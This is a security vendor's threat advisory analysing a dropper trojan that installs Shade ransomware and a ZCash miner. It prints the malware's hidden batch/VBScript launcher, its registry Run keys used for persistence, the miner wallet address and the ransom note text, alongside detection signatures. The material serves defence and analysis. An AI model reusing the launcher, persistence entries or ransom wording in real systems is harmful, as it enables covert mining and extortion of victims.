SonicWall Security Center
Share: Linkedin Share Facebook Like
Back to SonicALERT

Dropper trojan delivers Shade ransomware and ZCash crypto miner (Sep 1st, 2017)


The SonicWall Capture Labs Threat Research Team have observed a dropper Trojan that drops ransomware as well as crypto miner software. In this case, a variant of the Shade ransomware is dropped and a crypto coin miner that mines ZCash (ZEC).

Infection Cycle:

The Trojan makes the following DNS queries:


The Trojan drops the following files on to the filesystem:

  • %ALLUSERSPROFILE%\Application Data\SoftwareDistribution\ nheqminer32.exe
  • %ALLUSERSPROFILE%\Application Data\SysWOW64\D8pedj.cmd
  • %ALLUSERSPROFILE%\Application Data\Windows\csrss.exe [Detected as GAV: Shade.RSM_5 (Trojan)]
  • %ALLUSERSPROFILE%\Desktop\README{1 to 10}.txt
  • %APPDATA%\CF4ED5F2CF4ED5F2.bmp
  • %TEMP%\FA375141.rtf

The Trojan adds the following keys to the registry:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Command Line Support "cmd.exe /C C:\DOCUME~1\ALLUSE~1\APPLIC~1\SysWOW64\D8pedj.cmd"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem ""C:\Documents and Settings\All Users\Application Data\Windows\csrss.exe""

D8pedj.cmd contains the following script which starts:

      echo CreateObject("Wscript.Shell").Run ""
      ^& WScript.Arguments(0) ^& "", 0, False > "%TEMP%/QYHz1.vbs"
      && start /WAIT wscript.exe "%TEMP%/QYHz1.vbs" "C:\DOCUME~1\ALLUSE~1\APPLIC~1
      \SOFTWA~1\NHEQMI~1.EXE -l -u
      t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.FA0F586A -t 1" && del "%TEMP%\QYHz1.vbs"

README{1 to 10}.txt contains the following text:

      All the important files on your computer were encrypted.
      To decrypt the files you should send the following code:
      to e-mail address
      Then you will receive all necessary instructions.
      All the attempts of decryption by yourself will result only in irrevocable loss of your data.
      If you still want to try to decrypt them by yourself please make a backup at first because
      the decryption will become impossible in case of any changes inside the files.
      If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
      use the feedback form. You can do it by two ways:
      1) Download Tor Browser from here:
      Install it and type the following address into the address bar:
      Press Enter and then the page with feedback form will be loaded.
      2) Go to the one of the following addresses in any browser:

The Trojan contacts to obtain the machines external IP address:

The Trojan downloads the Shade ransomware binary, document_082017_6401df.exe [Detected as GAV: Shade.RSM_5 (Trojan)]:

Once executed, it displays CF4ED5F2CF4ED5F2.bmp on the desktop background:

It also displays the following russian text file: FA375141.rtf

The Trojan encrypts files on the system and renames them to {encrypted filename}.crypted000007.

In addition to ransomware, a crypto miner is also dropped onto the system. Rather than mining Bitcoin, it mines ZCash (ZEC) which is worth $283/ZEC USD at the time of writing. nheqminer32.exe can be seen running in the process list:

The address accumulating the rewards is t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep. Mining activity can be observed by visiting the website:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

      GAV: Dropper.RSM_6 (Trojan)
      GAV: Shade.RSM_5 (Trojan)

Back to top

Back to SonicALERT

Follow: Follow us on Facebook Follow us on Twitter Join the Conversation
© 2021 SonicWall | Privacy Policy | Conditions for use | Feedback | Live Demo | SonicALERT | Document Library | Report Issues
Version: 17.3 | S1MSW01